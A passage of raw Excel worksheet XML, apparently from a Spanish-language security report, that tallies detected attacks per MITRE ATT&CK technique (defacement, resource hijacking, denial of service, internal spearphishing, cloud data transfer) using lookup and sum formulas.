        <v>0</v>
      </c>
      <c r="BK46" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL46" s="12">
        <v>0</v>
      </c>
      <c r="BM46" s="13">
        <v>0</v>
      </c>
      <c r="BN46" s="394">
        <v>0</v>
      </c>
      <c r="BO46" s="292">
        <v>2</v>
      </c>
      <c r="BP46" s="322">
        <v>2</v>
      </c>
      <c r="BQ46" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (2)</v>
      </c>
      <c r="BR46" s="12">
        <v>0</v>
      </c>
      <c r="BS46" s="12">
        <v>2</v>
      </c>
      <c r="BT46" s="13">
        <v>1</v>
      </c>
      <c r="BU46" s="394">
        <v>2</v>
      </c>
      <c r="BV46" s="292">
        <v>0</v>
      </c>
      <c r="BW46" s="322">
        <v>0</v>
      </c>
      <c r="BX46" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY46" s="12">
        <v>0</v>
      </c>
      <c r="BZ46" s="13">
        <v>0</v>
      </c>
      <c r="CA46" s="394">
        <v>0</v>
      </c>
      <c r="CB46" s="292">
        <v>0</v>
      </c>
      <c r="CC46" s="322">
        <v>0</v>
      </c>
      <c r="CD46" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE46" s="12">
        <v>0</v>
      </c>
      <c r="CF46" s="12">
        <v>0</v>
      </c>
      <c r="CG46" s="13">
        <v>0</v>
      </c>
      <c r="CH46" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:86" ht="15" customHeight="1">
      <c r="A47" s="4">
        <f t="shared" si="3"/>
        <v>45</v>
      </c>
      <c r="B47" s="4" t="str">
        <f>IFERROR(VLOOKUP(A47,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1491</v>
      </c>
      <c r="C47" s="493" t="str">
        <f>IFERROR(VLOOKUP(B47,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Defacement</v>
      </c>
      <c r="D47" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B47)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E47" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F47" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (12)</v>
      </c>
      <c r="G47" s="292"/>
      <c r="H47" s="322"/>
      <c r="I47" s="322"/>
      <c r="J47" s="12"/>
      <c r="K47" s="13"/>
      <c r="L47" s="394"/>
      <c r="M47" s="322"/>
      <c r="N47" s="322"/>
      <c r="O47" s="322"/>
      <c r="P47" s="12"/>
      <c r="Q47" s="13"/>
      <c r="R47" s="394"/>
      <c r="S47" s="292"/>
      <c r="T47" s="322"/>
      <c r="U47" s="322"/>
      <c r="V47" s="12"/>
      <c r="W47" s="13"/>
      <c r="X47" s="394"/>
      <c r="Y47" s="392"/>
      <c r="Z47" s="392"/>
      <c r="AA47" s="322"/>
      <c r="AB47" s="392"/>
      <c r="AC47" s="16"/>
      <c r="AD47" s="394"/>
      <c r="AE47" s="392"/>
      <c r="AF47" s="392"/>
      <c r="AG47" s="322"/>
      <c r="AH47" s="392"/>
      <c r="AI47" s="16"/>
      <c r="AJ47" s="394"/>
      <c r="AK47" s="392"/>
      <c r="AL47" s="392"/>
      <c r="AM47" s="322"/>
      <c r="AN47" s="392"/>
      <c r="AO47" s="16"/>
      <c r="AP47" s="394"/>
      <c r="AQ47" s="292"/>
      <c r="AR47" s="322"/>
      <c r="AS47" s="322"/>
      <c r="AT47" s="12"/>
      <c r="AU47" s="13"/>
      <c r="AV47" s="394"/>
      <c r="AW47" s="392"/>
      <c r="AX47" s="392"/>
      <c r="AY47" s="322"/>
      <c r="BA47" s="16"/>
      <c r="BB47" s="394"/>
      <c r="BC47" s="292"/>
      <c r="BD47" s="322"/>
      <c r="BE47" s="322"/>
      <c r="BF47" s="12"/>
      <c r="BG47" s="13"/>
      <c r="BH47" s="394"/>
      <c r="BI47" s="292">
        <v>3</v>
      </c>
      <c r="BJ47" s="322">
        <v>2</v>
      </c>
      <c r="BK47" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (3)</v>
      </c>
      <c r="BL47" s="12">
        <v>2</v>
      </c>
      <c r="BM47" s="13">
        <v>1</v>
      </c>
      <c r="BN47" s="394">
        <v>1</v>
      </c>
      <c r="BO47" s="292">
        <v>10</v>
      </c>
      <c r="BP47" s="322">
        <v>9</v>
      </c>
      <c r="BQ47" s="322" t="str">
        <f t="shared" si="1"/>
        <v>9 (10)</v>
      </c>
      <c r="BR47" s="12">
        <v>2</v>
      </c>
      <c r="BS47" s="12">
        <v>4</v>
      </c>
      <c r="BT47" s="13">
        <v>1</v>
      </c>
      <c r="BU47" s="394">
        <v>8</v>
      </c>
      <c r="BV47" s="292">
        <v>0</v>
      </c>
      <c r="BW47" s="322">
        <v>0</v>
      </c>
      <c r="BX47" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY47" s="12">
        <v>0</v>
      </c>
      <c r="BZ47" s="13">
        <v>0</v>
      </c>
      <c r="CA47" s="394">
        <v>0</v>
      </c>
      <c r="CB47" s="292">
        <v>0</v>
      </c>
      <c r="CC47" s="322">
        <v>0</v>
      </c>
      <c r="CD47" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE47" s="12">
        <v>0</v>
      </c>
      <c r="CF47" s="12">
        <v>0</v>
      </c>
      <c r="CG47" s="13">
        <v>0</v>
      </c>
      <c r="CH47" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="48" spans="1:86" ht="15" customHeight="1">
      <c r="A48" s="4">
        <f t="shared" si="3"/>
        <v>46</v>
      </c>
      <c r="B48" s="4" t="str">
        <f>IFERROR(VLOOKUP(A48,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1496</v>
      </c>
      <c r="C48" s="493" t="str">
        <f>IFERROR(VLOOKUP(B48,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Resource Hijacking</v>
      </c>
      <c r="D48" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B48)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E48" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F48" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (12)</v>
      </c>
      <c r="G48" s="292"/>
      <c r="H48" s="322"/>
      <c r="I48" s="322"/>
      <c r="J48" s="12"/>
      <c r="K48" s="13"/>
      <c r="L48" s="394"/>
      <c r="M48" s="322"/>
      <c r="N48" s="322"/>
      <c r="O48" s="322"/>
      <c r="P48" s="12"/>
      <c r="Q48" s="13"/>
      <c r="R48" s="394"/>
      <c r="S48" s="292"/>
      <c r="T48" s="322"/>
      <c r="U48" s="322"/>
      <c r="V48" s="12"/>
      <c r="W48" s="13"/>
      <c r="X48" s="394"/>
      <c r="Y48" s="392"/>
      <c r="Z48" s="392"/>
      <c r="AA48" s="322"/>
      <c r="AB48" s="392"/>
      <c r="AC48" s="16"/>
      <c r="AD48" s="394"/>
      <c r="AE48" s="392"/>
      <c r="AF48" s="392"/>
      <c r="AG48" s="322"/>
      <c r="AH48" s="392"/>
      <c r="AI48" s="16"/>
      <c r="AJ48" s="394"/>
      <c r="AK48" s="392"/>
      <c r="AL48" s="392"/>
      <c r="AM48" s="322"/>
      <c r="AN48" s="392"/>
      <c r="AO48" s="16"/>
      <c r="AP48" s="394"/>
      <c r="AQ48" s="292"/>
      <c r="AR48" s="322"/>
      <c r="AS48" s="322"/>
      <c r="AT48" s="12"/>
      <c r="AU48" s="13"/>
      <c r="AV48" s="394"/>
      <c r="AW48" s="392"/>
      <c r="AX48" s="392"/>
      <c r="AY48" s="322"/>
      <c r="BA48" s="16"/>
      <c r="BB48" s="394"/>
      <c r="BC48" s="292"/>
      <c r="BD48" s="322"/>
      <c r="BE48" s="322"/>
      <c r="BF48" s="12"/>
      <c r="BG48" s="13"/>
      <c r="BH48" s="394"/>
      <c r="BI48" s="292">
        <v>0</v>
      </c>
      <c r="BJ48" s="322">
        <v>0</v>
      </c>
      <c r="BK48" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL48" s="12">
        <v>0</v>
      </c>
      <c r="BM48" s="13">
        <v>0</v>
      </c>
      <c r="BN48" s="394">
        <v>0</v>
      </c>
      <c r="BO48" s="292">
        <v>11</v>
      </c>
      <c r="BP48" s="322">
        <v>8</v>
      </c>
      <c r="BQ48" s="322" t="str">
        <f t="shared" si="1"/>
        <v>8 (11)</v>
      </c>
      <c r="BR48" s="12">
        <v>0</v>
      </c>
      <c r="BS48" s="12">
        <v>4</v>
      </c>
      <c r="BT48" s="13">
        <v>1</v>
      </c>
      <c r="BU48" s="394">
        <v>8</v>
      </c>
      <c r="BV48" s="292">
        <v>0</v>
      </c>
      <c r="BW48" s="322">
        <v>0</v>
      </c>
      <c r="BX48" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY48" s="12">
        <v>0</v>
      </c>
      <c r="BZ48" s="13">
        <v>0</v>
      </c>
      <c r="CA48" s="394">
        <v>0</v>
      </c>
      <c r="CB48" s="292">
        <v>0</v>
      </c>
      <c r="CC48" s="322">
        <v>0</v>
      </c>
      <c r="CD48" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE48" s="12">
        <v>0</v>
      </c>
      <c r="CF48" s="12">
        <v>0</v>
      </c>
      <c r="CG48" s="13">
        <v>0</v>
      </c>
      <c r="CH48" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="49" spans="1:86" ht="15" customHeight="1">
      <c r="A49" s="4">
        <f t="shared" si="3"/>
        <v>47</v>
      </c>
      <c r="B49" s="4" t="str">
        <f>IFERROR(VLOOKUP(A49,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1498</v>
      </c>
      <c r="C49" s="493" t="str">
        <f>IFERROR(VLOOKUP(B49,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Denial of Service</v>
      </c>
      <c r="D49" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B49)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>8</v>
      </c>
      <c r="E49" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1432072</v>
      </c>
      <c r="F49" s="579" t="str">
        <f t="shared" si="4"/>
        <v>8 (1432072)</v>
      </c>
      <c r="G49" s="292"/>
      <c r="H49" s="322"/>
      <c r="I49" s="322"/>
      <c r="J49" s="12"/>
      <c r="K49" s="13"/>
      <c r="L49" s="394"/>
      <c r="M49" s="322"/>
      <c r="N49" s="322"/>
      <c r="O49" s="322"/>
      <c r="P49" s="12"/>
      <c r="Q49" s="13"/>
      <c r="R49" s="394"/>
      <c r="S49" s="292"/>
      <c r="T49" s="322"/>
      <c r="U49" s="322"/>
      <c r="V49" s="12"/>
      <c r="W49" s="13"/>
      <c r="X49" s="394"/>
      <c r="Y49" s="392"/>
      <c r="Z49" s="392"/>
      <c r="AA49" s="322"/>
      <c r="AB49" s="392"/>
      <c r="AC49" s="16"/>
      <c r="AD49" s="394"/>
      <c r="AE49" s="392"/>
      <c r="AF49" s="392"/>
      <c r="AG49" s="322"/>
      <c r="AH49" s="392"/>
      <c r="AI49" s="16"/>
      <c r="AJ49" s="394"/>
      <c r="AK49" s="392"/>
      <c r="AL49" s="392"/>
      <c r="AM49" s="322"/>
      <c r="AN49" s="392"/>
      <c r="AO49" s="16"/>
      <c r="AP49" s="394"/>
      <c r="AQ49" s="292"/>
      <c r="AR49" s="322"/>
      <c r="AS49" s="322"/>
      <c r="AT49" s="12"/>
      <c r="AU49" s="13"/>
      <c r="AV49" s="394"/>
      <c r="AW49" s="392"/>
      <c r="AX49" s="392"/>
      <c r="AY49" s="322"/>
      <c r="BA49" s="16"/>
      <c r="BB49" s="394"/>
      <c r="BC49" s="292"/>
      <c r="BD49" s="322"/>
      <c r="BE49" s="322"/>
      <c r="BF49" s="12"/>
      <c r="BG49" s="13"/>
      <c r="BH49" s="394"/>
      <c r="BI49" s="292">
        <v>0</v>
      </c>
      <c r="BJ49" s="322">
        <v>0</v>
      </c>
      <c r="BK49" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL49" s="12">
        <v>0</v>
      </c>
      <c r="BM49" s="13">
        <v>0</v>
      </c>
      <c r="BN49" s="394">
        <v>0</v>
      </c>
      <c r="BO49" s="292">
        <v>167641</v>
      </c>
      <c r="BP49" s="322">
        <v>156822</v>
      </c>
      <c r="BQ49" s="322" t="str">
        <f t="shared" si="1"/>
        <v>156822 (167641)</v>
      </c>
      <c r="BR49" s="12">
        <v>0</v>
      </c>
      <c r="BS49" s="12">
        <v>8</v>
      </c>
      <c r="BT49" s="13">
        <v>0.875</v>
      </c>
      <c r="BU49" s="394">
        <v>156822</v>
      </c>
      <c r="BV49" s="292">
        <v>0</v>
      </c>
      <c r="BW49" s="322">
        <v>0</v>
      </c>
      <c r="BX49" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY49" s="12">
        <v>0</v>
      </c>
      <c r="BZ49" s="13">
        <v>0</v>
      </c>
      <c r="CA49" s="394">
        <v>0</v>
      </c>
      <c r="CB49" s="292">
        <v>0</v>
      </c>
      <c r="CC49" s="322">
        <v>0</v>
      </c>
      <c r="CD49" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE49" s="12">
        <v>0</v>
      </c>
      <c r="CF49" s="12">
        <v>0</v>
      </c>
      <c r="CG49" s="13">
        <v>0</v>
      </c>
      <c r="CH49" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="50" spans="1:86" ht="15" customHeight="1">
      <c r="A50" s="4">
        <f t="shared" si="3"/>
        <v>48</v>
      </c>
      <c r="B50" s="4" t="str">
        <f>IFERROR(VLOOKUP(A50,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1499</v>
      </c>
      <c r="C50" s="493" t="str">
        <f>IFERROR(VLOOKUP(B50,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Endpoint Denial of Service</v>
      </c>
      <c r="D50" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B50)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>10</v>
      </c>
      <c r="E50" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2061420</v>
      </c>
      <c r="F50" s="579" t="str">
        <f t="shared" si="4"/>
        <v>10 (2061420)</v>
      </c>
      <c r="G50" s="292"/>
      <c r="H50" s="322"/>
      <c r="I50" s="322"/>
      <c r="J50" s="12"/>
      <c r="K50" s="13"/>
      <c r="L50" s="394"/>
      <c r="M50" s="322"/>
      <c r="N50" s="322"/>
      <c r="O50" s="322"/>
      <c r="P50" s="12"/>
      <c r="Q50" s="13"/>
      <c r="R50" s="394"/>
      <c r="S50" s="292"/>
      <c r="T50" s="322"/>
      <c r="U50" s="322"/>
      <c r="V50" s="12"/>
      <c r="W50" s="13"/>
      <c r="X50" s="394"/>
      <c r="Y50" s="392"/>
      <c r="Z50" s="392"/>
      <c r="AA50" s="322"/>
      <c r="AB50" s="392"/>
      <c r="AC50" s="16"/>
      <c r="AD50" s="394"/>
      <c r="AE50" s="392"/>
      <c r="AF50" s="392"/>
      <c r="AG50" s="322"/>
      <c r="AH50" s="392"/>
      <c r="AI50" s="16"/>
      <c r="AJ50" s="394"/>
      <c r="AK50" s="392"/>
      <c r="AL50" s="392"/>
      <c r="AM50" s="322"/>
      <c r="AN50" s="392"/>
      <c r="AO50" s="16"/>
      <c r="AP50" s="394"/>
      <c r="AQ50" s="292"/>
      <c r="AR50" s="322"/>
      <c r="AS50" s="322"/>
      <c r="AT50" s="12"/>
      <c r="AU50" s="13"/>
      <c r="AV50" s="394"/>
      <c r="AW50" s="392"/>
      <c r="AX50" s="392"/>
      <c r="AY50" s="322"/>
      <c r="BA50" s="16"/>
      <c r="BB50" s="394"/>
      <c r="BC50" s="292"/>
      <c r="BD50" s="322"/>
      <c r="BE50" s="322"/>
      <c r="BF50" s="12"/>
      <c r="BG50" s="13"/>
      <c r="BH50" s="394"/>
      <c r="BI50" s="292">
        <v>0</v>
      </c>
      <c r="BJ50" s="322">
        <v>0</v>
      </c>
      <c r="BK50" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL50" s="12">
        <v>0</v>
      </c>
      <c r="BM50" s="13">
        <v>0</v>
      </c>
      <c r="BN50" s="394">
        <v>0</v>
      </c>
      <c r="BO50" s="292">
        <v>182787</v>
      </c>
      <c r="BP50" s="322">
        <v>182785</v>
      </c>
      <c r="BQ50" s="322" t="str">
        <f t="shared" si="1"/>
        <v>182785 (182787)</v>
      </c>
      <c r="BR50" s="12">
        <v>0</v>
      </c>
      <c r="BS50" s="12">
        <v>9</v>
      </c>
      <c r="BT50" s="13">
        <v>0.5</v>
      </c>
      <c r="BU50" s="394">
        <v>182682</v>
      </c>
      <c r="BV50" s="292">
        <v>4</v>
      </c>
      <c r="BW50" s="322">
        <v>4</v>
      </c>
      <c r="BX50" s="322" t="str">
        <f t="shared" si="2"/>
        <v>4 (4)</v>
      </c>
      <c r="BY50" s="12">
        <v>1</v>
      </c>
      <c r="BZ50" s="13">
        <v>0.1</v>
      </c>
      <c r="CA50" s="394">
        <v>4</v>
      </c>
      <c r="CB50" s="292">
        <v>4</v>
      </c>
      <c r="CC50" s="322">
        <v>4</v>
      </c>
      <c r="CD50" s="322" t="s">
        <v>4743</v>
      </c>
      <c r="CE50" s="12">
        <v>1</v>
      </c>
      <c r="CF50" s="12">
        <v>0</v>
      </c>
      <c r="CG50" s="13">
        <v>0.1</v>
      </c>
      <c r="CH50" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="51" spans="1:86" ht="15" customHeight="1">
      <c r="A51" s="4">
        <f t="shared" si="3"/>
        <v>49</v>
      </c>
      <c r="B51" s="4" t="str">
        <f>IFERROR(VLOOKUP(A51,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1505</v>
      </c>
      <c r="C51" s="493" t="str">
        <f>IFERROR(VLOOKUP(B51,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Server Software Component</v>
      </c>
      <c r="D51" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B51)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E51" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F51" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (3)</v>
      </c>
      <c r="G51" s="292"/>
      <c r="H51" s="322"/>
      <c r="I51" s="322"/>
      <c r="J51" s="12"/>
      <c r="K51" s="13"/>
      <c r="L51" s="394"/>
      <c r="M51" s="322"/>
      <c r="N51" s="322"/>
      <c r="O51" s="322"/>
      <c r="P51" s="12"/>
      <c r="Q51" s="13"/>
      <c r="R51" s="394"/>
      <c r="S51" s="292"/>
      <c r="T51" s="322"/>
      <c r="U51" s="322"/>
      <c r="V51" s="12"/>
      <c r="W51" s="13"/>
      <c r="X51" s="394"/>
      <c r="Y51" s="392"/>
      <c r="Z51" s="392"/>
      <c r="AA51" s="322"/>
      <c r="AB51" s="392"/>
      <c r="AC51" s="16"/>
      <c r="AD51" s="394"/>
      <c r="AE51" s="392"/>
      <c r="AF51" s="392"/>
      <c r="AG51" s="322"/>
      <c r="AH51" s="392"/>
      <c r="AI51" s="16"/>
      <c r="AJ51" s="394"/>
      <c r="AK51" s="392"/>
      <c r="AL51" s="392"/>
      <c r="AM51" s="322"/>
      <c r="AN51" s="392"/>
      <c r="AO51" s="16"/>
      <c r="AP51" s="394"/>
      <c r="AQ51" s="292"/>
      <c r="AR51" s="322"/>
      <c r="AS51" s="322"/>
      <c r="AT51" s="12"/>
      <c r="AU51" s="13"/>
      <c r="AV51" s="394"/>
      <c r="AW51" s="392"/>
      <c r="AX51" s="392"/>
      <c r="AY51" s="322"/>
      <c r="BA51" s="16"/>
      <c r="BB51" s="394"/>
      <c r="BC51" s="292"/>
      <c r="BD51" s="322"/>
      <c r="BE51" s="322"/>
      <c r="BF51" s="12"/>
      <c r="BG51" s="13"/>
      <c r="BH51" s="394"/>
      <c r="BI51" s="292">
        <v>0</v>
      </c>
      <c r="BJ51" s="322">
        <v>0</v>
      </c>
      <c r="BK51" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL51" s="12">
        <v>0</v>
      </c>
      <c r="BM51" s="13">
        <v>0</v>
      </c>
      <c r="BN51" s="394">
        <v>0</v>
      </c>
      <c r="BO51" s="292">
        <v>2</v>
      </c>
      <c r="BP51" s="322">
        <v>2</v>
      </c>
      <c r="BQ51" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (2)</v>
      </c>
      <c r="BR51" s="12">
        <v>0</v>
      </c>
      <c r="BS51" s="12">
        <v>1</v>
      </c>
      <c r="BT51" s="13">
        <v>1</v>
      </c>
      <c r="BU51" s="394">
        <v>2</v>
      </c>
      <c r="BV51" s="292">
        <v>0</v>
      </c>
      <c r="BW51" s="322">
        <v>0</v>
      </c>
      <c r="BX51" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY51" s="12">
        <v>0</v>
      </c>
      <c r="BZ51" s="13">
        <v>0</v>
      </c>
      <c r="CA51" s="394">
        <v>0</v>
      </c>
      <c r="CB51" s="292">
        <v>0</v>
      </c>
      <c r="CC51" s="322">
        <v>0</v>
      </c>
      <c r="CD51" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE51" s="12">
        <v>0</v>
      </c>
      <c r="CF51" s="12">
        <v>0</v>
      </c>
      <c r="CG51" s="13">
        <v>0</v>
      </c>
      <c r="CH51" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="52" spans="1:86" ht="15" customHeight="1">
      <c r="A52" s="4">
        <f t="shared" si="3"/>
        <v>50</v>
      </c>
      <c r="B52" s="4" t="str">
        <f>IFERROR(VLOOKUP(A52,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1534</v>
      </c>
      <c r="C52" s="493" t="str">
        <f>IFERROR(VLOOKUP(B52,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Internal Spearphishing</v>
      </c>
      <c r="D52" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B52)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E52" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F52" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (10)</v>
      </c>
      <c r="G52" s="292"/>
      <c r="H52" s="322"/>
      <c r="I52" s="322"/>
      <c r="J52" s="12"/>
      <c r="K52" s="13"/>
      <c r="L52" s="394"/>
      <c r="M52" s="322"/>
      <c r="N52" s="322"/>
      <c r="O52" s="322"/>
      <c r="P52" s="12"/>
      <c r="Q52" s="13"/>
      <c r="R52" s="394"/>
      <c r="S52" s="292"/>
      <c r="T52" s="322"/>
      <c r="U52" s="322"/>
      <c r="V52" s="12"/>
      <c r="W52" s="13"/>
      <c r="X52" s="394"/>
      <c r="Y52" s="392"/>
      <c r="Z52" s="392"/>
      <c r="AA52" s="322"/>
      <c r="AB52" s="392"/>
      <c r="AC52" s="16"/>
      <c r="AD52" s="394"/>
      <c r="AE52" s="392"/>
      <c r="AF52" s="392"/>
      <c r="AG52" s="322"/>
      <c r="AH52" s="392"/>
      <c r="AI52" s="16"/>
      <c r="AJ52" s="394"/>
      <c r="AK52" s="392"/>
      <c r="AL52" s="392"/>
      <c r="AM52" s="322"/>
      <c r="AN52" s="392"/>
      <c r="AO52" s="16"/>
      <c r="AP52" s="394"/>
      <c r="AQ52" s="292"/>
      <c r="AR52" s="322"/>
      <c r="AS52" s="322"/>
      <c r="AT52" s="12"/>
      <c r="AU52" s="13"/>
      <c r="AV52" s="394"/>
      <c r="AW52" s="392"/>
      <c r="AX52" s="392"/>
      <c r="AY52" s="322"/>
      <c r="BA52" s="16"/>
      <c r="BB52" s="394"/>
      <c r="BC52" s="292"/>
      <c r="BD52" s="322"/>
      <c r="BE52" s="322"/>
      <c r="BF52" s="12"/>
      <c r="BG52" s="13"/>
      <c r="BH52" s="394"/>
      <c r="BI52" s="292">
        <v>0</v>
      </c>
      <c r="BJ52" s="322">
        <v>0</v>
      </c>
      <c r="BK52" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL52" s="12">
        <v>0</v>
      </c>
      <c r="BM52" s="13">
        <v>0</v>
      </c>
      <c r="BN52" s="394">
        <v>0</v>
      </c>
      <c r="BO52" s="292">
        <v>6</v>
      </c>
      <c r="BP52" s="322">
        <v>6</v>
      </c>
      <c r="BQ52" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (6)</v>
      </c>
      <c r="BR52" s="12">
        <v>0</v>
      </c>
      <c r="BS52" s="12">
        <v>2</v>
      </c>
      <c r="BT52" s="13">
        <v>1</v>
      </c>
      <c r="BU52" s="394">
        <v>6</v>
      </c>
      <c r="BV52" s="292">
        <v>0</v>
      </c>
      <c r="BW52" s="322">
        <v>0</v>
      </c>
      <c r="BX52" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY52" s="12">
        <v>0</v>
      </c>
      <c r="BZ52" s="13">
        <v>0</v>
      </c>
      <c r="CA52" s="394">
        <v>0</v>
      </c>
      <c r="CB52" s="292">
        <v>0</v>
      </c>
      <c r="CC52" s="322">
        <v>0</v>
      </c>
      <c r="CD52" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE52" s="12">
        <v>0</v>
      </c>
      <c r="CF52" s="12">
        <v>0</v>
      </c>
      <c r="CG52" s="13">
        <v>0</v>
      </c>
      <c r="CH52" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="53" spans="1:86" ht="15" customHeight="1">
      <c r="A53" s="4">
        <f t="shared" si="3"/>
        <v>51</v>
      </c>
      <c r="B53" s="4" t="str">
        <f>IFERROR(VLOOKUP(A53,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1537</v>
      </c>
      <c r="C53" s="493" t="str">
        <f>IFERROR(VLOOKUP(B53,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Transfer Data to Cloud Account</v>
      </c>
      <c r="D53" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B53)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E53" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>76</v>
      </c>
      <c r="F53" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (76)</v>
      </c>
      <c r="G53" s="292"/>
      <c r="H53" s="322"/>
      <c r="I53" s="322"/>
      <c r="J53" s="12"/>
      <c r="K53" s="13"/>
      <c r="L53" s="394"/>
      <c r="M53" s="322"/>
      <c r="N53" s="322"/>
      <c r="O53" s="322"/>
      <c r="P53" s="12"/>
      <c r="Q53" s="13"/>
      <c r="R53" s="394"/>
      <c r="S53" s="292"/>
      <c r="T53" s="322"/>
      <c r="U53" s="322"/>
      <c r="V53" s="12"/>
      <c r="W53" s="13"/>
      <c r="X53" s="394"/>
      <c r="Y53" s="392"/>
      <c r="Z53" s="392"/>
      <c r="AA53" s="322"/>
      <c r="AB53" s="392"/>
      <c r="AC53" s="16"/>
      <c r="AD53" s="394"/>
      <c r="AE53" s="392"/>
      <c r="AF53" s="392"/>
      <c r="AG53" s="322"/>
